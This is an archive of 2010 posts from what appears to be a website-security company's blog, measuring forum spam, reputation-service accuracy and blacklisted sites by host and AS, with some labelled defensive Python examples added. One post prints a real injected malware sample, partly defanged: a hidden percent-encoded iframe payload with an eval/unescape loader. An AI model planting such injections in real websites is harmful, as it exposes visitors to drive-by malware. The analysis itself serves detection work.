Archive for January, 2010

“Online Pharmacy” Spam Stalks Internet Forums/Boards

January 26th, 2010

Malicious hackers have, for many years, offered their services to unscrupulous individuals and companies in exchange for money. With the growth of email spam advertising everything from medical supplements to cars and lottery tickets, email scrubbers and filters have taken the game up a notch, adding ever more layers of complexity to cut down on such spam. In turn, hackers have started to push advertising spam, such as medication ads and fraudulent scams, by compromising web-based message boards and forums.

Hackers employ two basic techniques:

  • Creating large numbers of users on forums. These accounts are then used to post spam on the message boards.
  • Exploiting Web Application vulnerabilities in the software used to run the forum.

Approximately two weeks ago, Lenny Zeltser, from ISC SANS, posted an informative article about online pharmacy ads popping up on message boards. In this vein we have conducted a limited experiment with about 14,000 websites which contain spam announcing online pharmacies.

The aim of the experiment:

  • What percentage of websites which advertise online pharmacies are message boards and Internet forums?
  • What Web Applications, e.g. CMS packages, are used on the message boards that are compromised?

We believe this will give us a rough estimate of how strongly hackers focus on message boards and forums as a vehicle for advertising spam. From another perspective, it gives some idea of how exposed a website is to abuse by hackers if it hosts a message board or forum.

Testing methodology:

We have used Google to mine the websites which contain certain keyword patterns such as “buy zocor online”, or “buy brand kamagra online” etc. Once the links suggested by Google were mined, each of the websites was tested against Google’s Safe Browsing List to determine if they had hosted malware (according to Google). Next, an analysis was done to determine if the link(s) mined from Google pointed to a forum or message board. This was done by identifying the presence of multiple strings inside a link. For example, if a link has the keywords “topic”, “view”, “thread” or similar keywords, including characters associated with dynamic page generation, it is probably hosting a message board or forum.
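The pipeline just described, as an added example that is not the post's own code: a hash lookup of the site name against a constructed local set standing in for the Google Safe Browsing list, followed by the forum heuristic, run over constructed URLs. The host canonicalization, the extra forum keywords and the `.php` check are assumptions on top of what the post states.

```python
# Added example (not the original post's code): the pipeline the article
# describes, run over constructed URLs. The blacklist is a constructed local
# set of MD5 digests standing in for the Google Safe Browsing hash list.
import hashlib
from urllib.parse import urlsplit

# Keywords the article names, plus common forum script names (assumption:
# typical phpBB / vBulletin / SMF URL markers).
FORUM_KEYWORDS = ("topic", "view", "thread", "showthread", "viewtopic", "forum", "board")
# Characters associated with dynamically generated pages (query strings).
DYNAMIC_CHARS = ("?", "=", "&")


def canonical_host(url):
    """Lower-case host without trailing dot or port; assumption: the article's
    'website name' is the host part of the mined link."""
    return (urlsplit(url).hostname or "").rstrip(".").lower()


def host_hash(host):
    """MD5 of the canonical host, the form the article says it matched on."""
    return hashlib.md5(host.encode("ascii", "ignore")).hexdigest()


def on_blacklist(url, blacklist_hashes):
    return host_hash(canonical_host(url)) in blacklist_hashes


def looks_like_forum(url):
    """The article's heuristic: forum keywords in the path or query, together
    with characters associated with dynamic page generation. The substring
    match is deliberately loose, so e.g. 'page=view' would also trigger it."""
    parts = urlsplit(url)
    target = (parts.path + "?" + parts.query).lower()
    has_keyword = any(k in target for k in FORUM_KEYWORDS)
    # Assumption: a .php script without a query string still counts as dynamic.
    is_dynamic = any(c in url for c in DYNAMIC_CHARS) or parts.path.lower().endswith(".php")
    return has_keyword and is_dynamic


def classify(urls, blacklist_hashes):
    """Per-URL verdicts plus the two aggregate figures the article reports:
    share of forum links and count of blacklisted hosts."""
    rows = [(u, looks_like_forum(u), on_blacklist(u, blacklist_hashes)) for u in urls]
    forums = sum(1 for _, is_forum, _ in rows if is_forum)
    blacklisted = sum(1 for _, _, bad in rows if bad)
    return {
        "rows": rows,
        "forum_pct": round(100.0 * forums / len(rows), 2) if rows else 0.0,
        "blacklisted": blacklisted,
    }


# Constructed input: the kind of links a "buy <drug> online" query returns.
SAMPLE_URLS = [
    "http://forum.example.invalid/viewtopic.php?f=3&t=1201",
    "http://example.invalid/showthread.php?t=44",
    "http://blog.example.invalid/2010/01/buy-zocor-online.html",
    "http://static.example.invalid/about.html",
    "http://bad.example.invalid/forum/index.php?topic=9.0",
]
# Constructed blacklist: only bad.example.invalid is "listed".
BLACKLIST = {host_hash("bad.example.invalid")}

if __name__ == "__main__":
    result = classify(SAMPLE_URLS, BLACKLIST)
    for url, is_forum, bad in result["rows"]:
        print(f"{'forum' if is_forum else 'other':5}  {'LISTED' if bad else 'clean':6}  {url}")
    print(f"forum share: {result['forum_pct']}%  blacklisted hosts: {result['blacklisted']}")
```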

The test was conducted between January 21st and January 23rd, 2010.

Popular software packages installed on compromised forums and message boards.

We present the most interesting results below:

  • 47.9% of websites displaying “online pharmacy” spam are message boards and forums.
  • None of the websites advertising “online pharmacy” spam were listed on Google Safe Browsing List.
  • 20.28% of forums displaying “online pharmacy” spam were using Jquery.
  • 15.73% of forums displaying “online pharmacy” spam were using phpBB.
  • 11.54% of forums displaying “online pharmacy” spam were using WordPress.
  • 10.84 % of forums displaying “online pharmacy” spam were using Mootools.

These results, along with the other software packages, helper scripts and tracking code we identified, are depicted in the graph above.

This small experiment shows that a high percentage of websites displaying online spam campaigns are message boards or forums. This indicates that there are many unsecured software installations and older software packages still in use which are often exploited by malicious individuals to post spam. Further, it seems that most sites which were hacked are using jQuery. This supports our previous observations regarding jQuery scripts being used to push malware to unsuspecting visitors.

How Safe are Internet Website Directories?

January 23rd, 2010

Recently, we told you that Dmoz.org, one of the largest user-edited directories on the Internet, is also one of the safest directories. Directories such as Dmoz.org contain links to hundreds of thousands to millions of sites. These directories are categorized by volunteers or through automated means. Many search engines, including Google, Hotbot and others, potentially use data from these directories. These directories are also used as efficient lookup services by thousands of web-surfers who want to locate sites which belong to a very specific category.

Given the important role that these directories play in the Internet, one would expect that they would make an attempt to point only to websites which are “safe.” By “safe,” we mean sites which have not been injected with malware, via code-injection attacks or other attack vectors.

We are not picking on Dmoz.org here. We were very impressed to see that none of the 2.8 million sites we profiled were present on the Google Safe Browsing List. This could indicate that sites listed on Dmoz.org care about their image, and hence about their visitors, and take appropriate precautions against malware.

To follow up on our previous article, we have further analyzed 10,000 sites, randomly chosen from the Dmoz.org corpus of nearly 2.8 million websites. Each of the 10,000 sites was tested against each of the below website reputation services.

Note: When analyzing a domain name or URL for verification against the Google Safe Browsing List, we calculated the hash of the website name and matched it against the list. The test was conducted between January 19th and January 21st, 2010. The list of domain names tested is presented at the end of this article.

We identify the most interesting results below:

  1. McAfee SiteAdvisor marked 0.39% of domains as Unsafe, 84.23% as Safe, 15.08% as Untested and 0.3% as Potentially-Unsafe.
  2. Norton Safe Web marked 0.39% of domains as Unsafe, 59.02% as Safe, 39.79% as Untested and 0.8% as Potentially-Unsafe.
  3. Google Safe Browsing marked 0.02% of domains as Unsafe, 99.98% as Safe.
    Note: The presence of the hash of the domain name being tested, on the Google Safe Browsing List, is interpreted as “Unsafe” while its absence is interpreted as “Safe.”
  4. Microsoft Bing marked 0.06% of domains as Unsafe, 93.2% as Safe, and 6.74% as Untested.
  5. Comodo Site Inspector marked 0.08% of domains as Unsafe, 99.46% as Safe, and 0.44% as Unreachable.
    Note: We were only able to test the first 5000 URLs with Comodo Site Inspector.

McAfee SiteAdvisor and Norton Safe Web seem to detect nearly 19 times more websites as “Unsafe to Visit” than Google, and nearly 6 times more than Bing. It is notable that there is an order of magnitude difference in the number of websites marked as “Unsafe to Visit” by these competing services.

We would like to know how long McAfee, Norton or Bing cache results for a particular site. Google allows webmasters to request a review when they believe the site has been disinfected, and Comodo’s service seems to be an on-demand service. This makes an interesting place to start for a future experiment. Further, it would be interesting to see how sites listed on the Yahoo Directory and other directories are classified by these services.

An Interesting Sample of Malware

January 21st, 2010

This afternoon, a post on Badwarebusters.org reminded me of a somewhat interesting piece of malicious code I have not seen for some time. Our scanners flagged it as malware.

The original post is found here, answered by redleg on Badwarebusters.org.

This malware, found embedded in “eslpod.com/website/index.php”, is displayed below. The code has been slightly modified so as not to work as intended if loaded up and run in a browser.

<h4 id="Fl" style="display:none;">%64%6f%63%75%6d%65%6e%74%2e%77%72%74%65%28%22%3c%69%66%72%61%6d%65%20%73%72%63%3d%5c%22%68%74%74%70%3a%2f%2f%74%72%61%66%2e%74%72%61%6e%73%63%6f%6e%74%69%6e%65%6e%74%61%6c%2d%73%65%72%76%69%63%65%2e%67%2f%69%6e%64%65%78%2e%70%68%70%5c%22%20%73%74%79%6c%65%3d%5c%22%64%69%73%70%6c%61%79%3a%6e%6f%6e%65%3b%5c%22%3e%3c%2f%69%66%72%61%6d%65%3e%22%29%3b</h4>

<script>
ar aK=docume nt.getElem entById("Fl"), A x=ev al;
aK = aK.inne rHTML;
Ax(unescape(aK));
</script>

It is interesting to see how hackers keep trying new tricks to fool scanning systems. Most code-injection attacks deliver the payload directly within the script tags. Here, the case is slightly different: the attacker has disguised the malicious payload as a plain, hidden web element inside the page, and a small script uses the getElementById function to read it back, unescape it and execute it.
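A scanner-side check for this trick, as an added example (not code from the post or its scanners): find hidden elements whose entire text is percent-encoded, decode them, and report script-like content and whether an inline loader references the element by id. The page fragment is constructed for the test and its decoded payload points at example.invalid.

```python
# Added example (not code from the original post): a scanner-side check for
# the trick described above, a hidden element whose text is a percent-encoded
# script that a small loader later unescapes and evals. The page fragment is
# constructed for this test and its decoded payload points at example.invalid.
import re
from html import unescape as html_unescape
from urllib.parse import unquote

# Any element with an opening tag, attributes, body and matching closing tag.
ELEMENT = re.compile(r"<(\w+)\b([^>]*)>(.*?)</\1\s*>", re.I | re.S)
PERCENT_RUN = re.compile(r"^(?:%[0-9a-f]{2})+$", re.I)
# Constructs a decoded payload should not contain if it is an innocent label.
SUSPICIOUS = ("document.write", "<iframe", "<script", "eval(", "unescape(")


def find_hidden_encoded_payloads(html):
    """Return one record per hidden element whose entire text is %xx-encoded:
    the element id, the decoded text, the suspicious markers it contains and
    whether an inline script references the element by id (loader present)."""
    findings = []
    for tag, attrs, body in ELEMENT.findall(html):
        hidden = re.search(r"display\s*:\s*none", attrs, re.I)
        id_match = re.search(r"""\bid\s*=\s*["']([^"']+)["']""", attrs, re.I)
        text = html_unescape(body).strip()
        if not hidden or len(text) < 8 or not PERCENT_RUN.match(text):
            continue
        # JS unescape() and urllib's unquote() agree on %xx sequences; the
        # %uXXXX form JS also accepts is not handled here.
        decoded = unquote(text)
        lowered = decoded.lower()
        element_id = id_match.group(1) if id_match else ""
        loader = bool(element_id) and re.search(
            r"""getElementById\(\s*["']%s["']\s*\)""" % re.escape(element_id), html) is not None
        findings.append({
            "tag": tag, "id": element_id, "decoded": decoded,
            "markers": [s for s in SUSPICIOUS if s in lowered],
            "loader_present": loader,
        })
    return findings


def is_suspicious(html):
    """Flag the page when a hidden encoded blob decodes to script-like text."""
    return any(f["markers"] for f in find_hidden_encoded_payloads(html))


# Constructed fragment with the same shape as the sample above (defanged target).
PAYLOAD = (b'document.write("<iframe src=\\"http://example.invalid/index.php\\" '
           b'style=\\"display:none;\\"></iframe>");')
ENCODED = "".join("%%%02x" % b for b in PAYLOAD)
SAMPLE_HTML = (
    f'<h4 id="Fl" style="display:none;">{ENCODED}</h4>\n'
    '<script>var aK=document.getElementById("Fl"), Ax=eval;\n'
    "aK = aK.innerHTML;\nAx(unescape(aK));</script>\n"
    '<div id="note" style="display:none;">just a hidden note</div>'
)

if __name__ == "__main__":
    for f in find_hidden_encoded_payloads(SAMPLE_HTML):
        print(f"#{f['id']} <{f['tag']}> loader={f['loader_present']} markers={f['markers']}")
        print("  decoded:", f["decoded"])
    print("suspicious:", is_suspicious(SAMPLE_HTML))
```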

The payload by itself is not so interesting. It has been known to appear in different variants before this particular example.

The payload is displayed below:

document.wri te("<ifra me src=\"hxxp://traff.tr anscon tin enta l-serv ice.org/i n dex.php\" style=\"dis play:none;\"></ifr me>");

The iframe points to a page that contains the following:

<!--LiveInternet counter-->
<script t ype="text/javascript">
<!--
document.write("<a href='hxxp://www.li veinte rnet.ru/click' "+
"target=_blank><img src='hxxp://cou nter.yad ro.ru/hit?t52.6;r"+
escape(document.referrer)+((typeof(screen)=="undefined")?"":
";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?
screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+
";"+Math.random()+"' alt='' title='LiveInternet: показано число просмотров и"+
" посетителей за 24 часа' "+"border='0' width='88' height='31'><\/a>")
//-->
</script>
<!--/LiveInternet-->

This snippet should be flagged by many scanning services simply because of the reputation of the sites mentioned inside it (see Malware Patrol).

Till next time, surf safe.

Where Can You Find (2.8 million) Safe Websites?

January 19th, 2010

Hackers are hitting websites hard and fast. Every day, upwards of 6,000 new websites are compromised by malware due to code injection, FTP credential compromise, weak server security, web-application flaws and the full gamut of other security issues.

In this vein, any system used to determine whether a website is clean or infected needs to be able to handle large numbers of sites for analysis. This ability ensures a high throughput rate when analyzing “suspect” sites.

One of our goals at StopTheHacker.com, is to target throughput rates in excess of 1,000,000 sites per day. This obviously necessitates an automated process with high reliability and accuracy (we have it). To develop such an automated process, we focus heavily on advanced Machine Learning and Artificial Intelligence techniques which can learn on the fly from compromised websites and update to catch even more bad websites. All on the fly.

In order to develop training sets for machine-learning based automated solutions, one needs to get hold of a massive dataset. We recently profiled over 2.8 million websites (2,800,560 to be exact). What dataset is this? All these profiled sites were sourced from DMOZ. Surprisingly, none of these websites are listed in the Google Safe Browsing List as of January 19, 2010.
Note: DMOZ is a user-edited directory of sites (which provided a good starting point for this experiment).

Each website is classified according to a categorization scheme described here. We used the description to download and analyze around 2.8 million sites. Each site name was entered in a program which calculated a hash of the site name and looked it up on the Google Safe Browsing List to determine if the website was on the malware list or not.

Interestingly, we did not find any of the sites on the Google Safe Browsing List. This definitely adds a feather of sorts to DMOZ Directory’s proverbial hat. I think they might just be able to claim that they are the “largest and safest human-edited directory on the web”!

A graphical representation of the top 50 categories, sorted by those having the most websites is presented, followed by a list of the top 100 categories.

Do News Aggregation Websites Point to Blacklisted Sites?

January 19th, 2010

News aggregation sites, like Digg.com, Reddit.com, Ycombinator and Yahoo Buzz play an important part in the lives of many web-surfers. It is reported that sites like Digg.com have garnered more visitors than heavyweights like Facebook [1].

I was recently asked: “What is the probability of a site listed on popular news aggregation sites being blacklisted?” The answer to this question is not a very simple one. We understand that benign websites are often compromised by malicious code, sometimes due to application-layer vulnerabilities or server-side vulnerabilities or a combination of both. Good websites can even be compromised by simple password disclosure or, worse, a blatantly nonchalant attitude towards security.

My instinct tells me that any site listed on these well known news aggregation sites, if infected, will be spotted rather quickly by some visitor to the “infected” website. If the webmaster is even half interested in the reputation of their site, they will take prompt action to remove the offending code as the number of visitors providing feedback would continue to grow. Thereby, even if a site listed on a news aggregation site were to be compromised I think it would be fixed up rather quickly.

In short I think the probability of finding an “infected” site listed on these news aggregation websites would be pretty low. To prove this, at StopTheHacker.com we conducted a small test. We analyzed around 1162 unique websites which were pointed to by one of the four news aggregation websites below:

We found that none of the analyzed 1162 sites were listed on Google’s Safe Browsing malware hash list as of January 19, 2010. This might be an indication of the fact that good content, interesting to the masses, is hosted on sites conscious about their security and the safety of their visitors. Given the state of Internet security today, this is one of few heartening trends.

Large Webhosts: How Serious About Security Are They?

January 19th, 2010

Some of the largest web hosting companies in the United States and abroad each host more than 500,000 websites. These web-hosting companies focus on providing a cost-effective solution for clients to develop and maintain their Internet-facing websites. To protect these websites, the hosting companies often use Web Application Firewalls (WAFs) and more traditional firewall-type devices, along with password-protected (S)FTP access.

Anyone delving into web application security would realize that simply throwing up a bunch of WAFs to deal with code-injection attacks is not the best solution. Code-injection attacks are constantly evolving because they give hackers a convenient medium for delivering malicious code to unsuspecting Internet surfers. It is not for lack of effort on the part of WAF developers that code-injection attacks are not being nipped in the bud; rather, this attack vector is such an attractive medium for hackers to further their nefarious intentions, with comparatively less effort than other, more involved, hacking techniques.

Bottom line, code injection attacks and signatures are constantly changing. WAFs used by many hosting companies cannot guarantee full protection against them.

Two big reasons it is difficult to protect websites:

  1. You can only protect against what you know about
  2. WAFs are not self-learning and self-tuning

At StopTheHacker.com, our approach is to develop systems based on Artificial Intelligence techniques which can learn from attacks and adapt using machine learning to block and identify previously unknown code-injection incidents.

In this article we try to identify how many sites from each of the top few web-hosting companies are currently blacklisted. This gives us an indication of the kind of security being employed and the effectiveness of the systems.

This test was conducted on January 19, 2010. The AS data was mined from CAIDA and was correlated with Google Safe Browsing data.

Number of sites blacklisted by hosting company:

Hosting Company Name           ASN  Sites Blacklisted

IX WebHosting                32392               4160
GoDaddy                      26496              12648
DreamHost                    26347               5636
GigeNet                      32181                647
Peer 1                       11388               2332
Lunar Pages                  15244               3754
iWeb                         32613               2161
ThePlanet/HostGator          21844              11347
Bluehost/Hostmonster         11798               6232
LiquidWeb                    32244               3113
Leaseweb                     16265               2393
Schlund (1&1)                 8560               9105
Tele2 Telecommunication GmbH  8437               8229
China Telecom                 4812               4919
Inetwork/iEurop              29629               3197
NetworkSolutions              6245                739
RackSpace                    33070                698

Clearly, whatever security mechanisms are being employed by these hosting companies, they are not enough to stop hordes of their websites from falling prey to code-injection attacks and other forms of malicious attacks. Perhaps the owners of these large numbers of compromised websites will force web-hosting companies to take a more proactive approach to safe hosting for their clients.

Interestingly, a web-hosting company which focuses on a secure hosting experience maps to ASN 7819, which seems to host 26 malicious sites.

EDIT: On Jan 20 2010, 7:05 AM PST, we received feedback from the web-hosting company which focuses on a secure web-hosting experience that the IP ranges mentioned (below) in this article are not used by them to host websites, but simply belong to the datacenter they employ. We will be very interested in re-evaluating the IP ranges that are used by them to present websites on the Internet.

Website-Reputation Services Agree to Disagree

January 17th, 2010

We recently published statistics comparing various website reputation services and have received good feedback over private channels regarding that article. In this sequel we add Microsoft Bing’s malware filter to the comparison with the other website reputation services.

At StopTheHacker.com (Jaal LLC) we have conducted tests of 721 URLs, all of which have been reported as malicious by volunteers of various blacklists. We follow a similar format for presentation of results as in the last post.

Website Reputation services: agree to disagree.

Note: All 721 domains/URLs, were reported as malicious, and were collected from malware.com.br on January 14, 2010. The blue column (maximum 100) indicates the percentage of sites that the website-reputation service correctly identified as unsafe. The orange column (maximum 100) indicates the percentage of sites that the website-reputation services incorrectly identified as safe.

The aim of the test:

  1. Identify the accuracy of the website reputation service
  2. Identify the overlap in terms of safe/unsafe websites

We present the most interesting results in this article. First we detail the parameters of the testing procedure to provide an idea of how the test was set up.

First, 721 URLs were collected from malware.com.br (mbr) on January 14, 2010. These URLs are reported for listing by one or more of the following: individuals, organizations, agencies and software products or services. For the purposes of this test we assume that all the URLs obtained from the “regular” list on mbr are malicious and hence deemed “unsafe” to visit.

We compare the reputation provided by each website-reputation service and observe how many websites are marked unsafe, safe, untested, maybe-unsafe/caution/potentially-unsafe, and unreachable.

Website-reputation services tested:

Note that when analyzing a domain name or URL for checking against the Google Safe Browsing API, we calculated the MD5 hash of the website name to match against the malware hash list. The test was conducted on January 15, 2010. The list of domain names tested is presented below, and a graph representing the statistics for the 721 sites tested is above.

We identify the most interesting results below:

  1. McAfee SiteAdvisor marked 36.75% of domains as Unsafe, 27.18% as Safe, 32.32% as Untested and 3.74% as Potentially-Unsafe.
  2. Norton Safe Web marked 41.75% of domains as Unsafe, 45.49% as Safe, 4.3% as Untested and 8.32% as Potentially-Unsafe.
  3. Google Safe Browsing marked 5.96% of domains as Unsafe, 94.04% as Safe.
    Note: The presence of the hash of the domain name being tested on the Google malware hash list is interpreted as “unsafe,” while its absence is interpreted as “safe.”
  4. Microsoft Bing marked 0.69% of domains as Unsafe, 34.26% as Safe, and 65.05% as Untested.
  5. Comodo SiteInspector marked 0.19% of domains as Unsafe, 95.82% as Safe, and 4.08% as Unreachable.

This follow-up experiment also shows that the variance between website reputation services that are currently being offered by large Internet-services/security companies continues to be very large indeed.

After discussions with representatives of the companies mentioned in this article, and having gained a better idea of their behind-the-scenes methodologies, it seems that these website reputation services will continue to “agree to disagree.” We welcome their comments.

A note on differences between website reputation services:

Some of the services scan pages and some scan parts of a site. Some scan for potential “signs” of an infection, while others scan for the “post-mortem” effect of an infection, such as an exploit being launched. Furthermore, the time difference between one service testing a web page or site and another testing the same page can also complicate matters. At StopTheHacker.com we recognize the current limitations of the website reputation services being offered by the industry.

In conclusion, while website reputation services have come a long way, they still have an even longer path to tread in order to become something that users should trust implicitly.

Do Zombie IPs Host Blacklisted Websites?

January 12th, 2010

Zombie IPs can be defined as Internet addresses which participate in botnet communications. When Internet surfers visit websites contaminated with malware, the malicious code is often successful in infecting the visitor’s computer. Once the malware has installed itself on the surfer’s personal computer, it proceeds to receive commands from a “controller.” This controller is in many cases an IRC chat channel or a more sophisticated system.

At StopTheHacker.com, we have tried to investigate whether there is a correlation between zombie IP addresses (botnet communication sources) and blacklisted websites. If there is a strong correlation, then it points to a disturbing trend that servers used to host websites, are infected at two levels. The websites themselves are infected and there is some kind of botnet malware hosted on those servers as well.

The Gumblar family of infections has targeted websites by installing malicious binaries on end-user clients and then sniffing for FTP credentials, which are used to inject malicious code into sites. This experiment provides a preliminary look into whether this kind of malware is only targeting sites, or is also building botnets out of the infected machines.

Experiment Setup

We examined 178 CIDR IP address ranges obtained from Spamhaus. The entire IP address space covered 1,508,096 IP addresses. Out of these, a random sample of 1,600 IP addresses was chosen. We then attempted to determine the websites hosted on each IP address and checked them against the Google Safe Browsing list. The experiment was conducted on January 11, 2010.

Experiment Summary

Results in brief:

  • The majority of zombie IPs do not seem to host any blacklisted websites.
  • Only 0.5% IPs seemed to host a website, none of which were present in the Google blacklist.

This is an indicator that zombie IPs do not usually host blacklisted websites. It seems that the malware installs itself stealthily on end-clients and sniffs for FTP credentials, and does not really try to join the host machine to a botnet. This could be due to a concern that creating or joining a botnet increases the chances of the malware being detected on the host. However, given the robust and increasingly interconnected cycle of cyber-crime proliferating on the Internet, this trend may change soon. We will be keeping a close eye on it, and expect to publish more results as a follow-up to this initial experiment.

Profiling Autonomous Systems Hosting Blacklisted Websites

January 1st, 2010

An Autonomous System, or AS, is a routing construct that represents a group of networks under the control of an organization (credit for edit: Max@badwarebusters.org). These form the “structure” of the Internet. These organizations can be thought of as web-hosting companies, large Internet-based companies or resellers of bandwidth and IP addresses. They are usually large organizations for whom simply getting an Internet connection and hosting their own website is not enough.

In recent months, the trend of benign websites being affected by code injection clearly shows that attacks injecting malware into unsuspecting websites are on the rise. It is important to understand the profile of the ASes which are actually providing transit to infected websites hosted within their systems, since each AS provides the bandwidth and resources that support the download of malware to the computers of unsuspecting visitors to a compromised website. ASes, or more specifically the hosting companies and other network operators behind them, should play a pivotal role in addressing compromised websites.

At StopTheHacker.com, we have conducted extensive experiments to analyze and profile over 20,000 ASes to identify which ASes are the worst offenders in terms of hosting blacklisted websites. We used Google Safe Browsing data, also accessible via StopBadware.org (which sources data from Google and Sunbelt), to identify and trend which ASes are responsible for the proliferation of badware on the Internet. We correlated AS size with data available from CAIDA to determine whether larger ASes are more at fault or not.

We present some brief results below:

  1. The average percentage of blacklisted websites in
    • Top 10 ASes (according to number of sites noted by Google) is 3.5%
    • ASes with Ranks 11-23 (according to number of sites noted by Google) is 3.75%
    • ASes with Ranks 24-40 (according to number of sites noted by Google) is 5.01%
  2. The AS with the highest percentage of blacklisted sites, is AS 16557 (Colo Solutions, Inc.), with close to 60% of 10,000 sites blacklisted.
  3. The Top 50 ASes, which host more than 10,000 sites each and have at least 6% of websites blacklisted, host 151,000 blacklisted sites, combined.

Interesting observations:

  1. AS 16557 (Colo Solutions, Inc.), is well known for popping up on blacklists related to peer-to-peer networks [Is someone tracking P2P users]. It seems that this AS, which is not really concerned about P2P traffic emanating from within its systems, traffic which is potentially used to exchange copyrighted material, is also not interested in paying attention to malware infected websites hosted within its networks.
  2. AS 15169 (Google Inc.), had 590734 sites analyzed and 6046 of them were found to contain malware.
  3. AS 14173 (Photobucket), had zero sites infected out of 399424 sites analyzed.
  4. The Largest AS (Level 3 Communications) according to connection degree, see CAIDA’s AS listing, was hosting 571 infected sites out of 136305 sites analyzed by Google.
  5. AS 7018 (AT&T), was hosting 97 infected sites out of 7947 sites analyzed by Google.
  6. AS 701 (Verizon), was hosting 117 infected sites out of 7248 sites analyzed by Google.
  7. AS 1239 (Sprint), was hosting 117 infected sites out of 3958 sites analyzed by Google.
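How the per-rank-band averages and the “Top 50” selection above can be computed from a per-AS table, as an added example that is not StopTheHacker’s own tooling. The rows are constructed from the figures quoted in this post; the AS 16557 row approximates “close to 60% of 10,000”, and the AS number for Level 3 is assumed since the post names only the operator.

```python
# Added example (not StopTheHacker's own tooling): computing the per-rank-band
# averages and the "Top 50 worst offenders" selection described above from a
# per-AS table. Rows are constructed from the figures quoted in this post; the
# AS 16557 row is an approximation of "close to 60% of 10,000".
from dataclasses import dataclass


@dataclass
class ASRecord:
    asn: int
    name: str
    sites_analyzed: int
    sites_blacklisted: int

    @property
    def pct_blacklisted(self):
        if not self.sites_analyzed:
            return 0.0
        return 100.0 * self.sites_blacklisted / self.sites_analyzed


def rank_by_sites(records):
    """Rank 1 = AS with the most sites analyzed, the ranking the post uses."""
    return sorted(records, key=lambda r: r.sites_analyzed, reverse=True)


def band_average(ranked, first, last):
    """Mean blacklist percentage over ranks first..last (1-based, inclusive),
    i.e. the 'Top 10', '11-23' and '24-40' figures in the post."""
    band = ranked[first - 1:last]
    return sum(r.pct_blacklisted for r in band) / len(band) if band else 0.0


def worst_offenders(records, min_sites=10_000, min_pct=6.0, top=50):
    """ASes with at least min_sites analyzed and at least min_pct blacklisted,
    ordered by percentage; the selection criterion behind the post's Top 50."""
    eligible = [r for r in records
                if r.sites_analyzed >= min_sites and r.pct_blacklisted >= min_pct]
    return sorted(eligible, key=lambda r: r.pct_blacklisted, reverse=True)[:top]


# Constructed table from the figures quoted in this post.
RECORDS = [
    ASRecord(15169, "Google Inc.", 590734, 6046),
    ASRecord(14173, "Photobucket", 399424, 0),
    ASRecord(3356, "Level 3 Communications", 136305, 571),  # ASN assumed, not in the post
    ASRecord(16557, "Colo Solutions, Inc.", 10000, 5950),    # approximation of "close to 60%"
    ASRecord(7018, "AT&T", 7947, 97),
    ASRecord(701, "Verizon", 7248, 117),
    ASRecord(1239, "Sprint", 3958, 117),
]

if __name__ == "__main__":
    ranked = rank_by_sites(RECORDS)
    for rank, r in enumerate(ranked, start=1):
        print(f"{rank:2}  AS{r.asn:<6} {r.name:<24} {r.sites_analyzed:>7} {r.pct_blacklisted:6.2f}%")
    print(f"average over ranks 1-3: {band_average(ranked, 1, 3):.2f}%")
    print("worst offenders:", [r.asn for r in worst_offenders(RECORDS)])
```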

Making Sense of the Results

Below we present some graphs to highlight the percentage of blacklisted websites hosted by the top few ASes. Note that all AS rankings below are based on the number of websites analyzed by Google. An AS with rank 1 hosts more websites, analyzed by Google than an AS with rank 2.
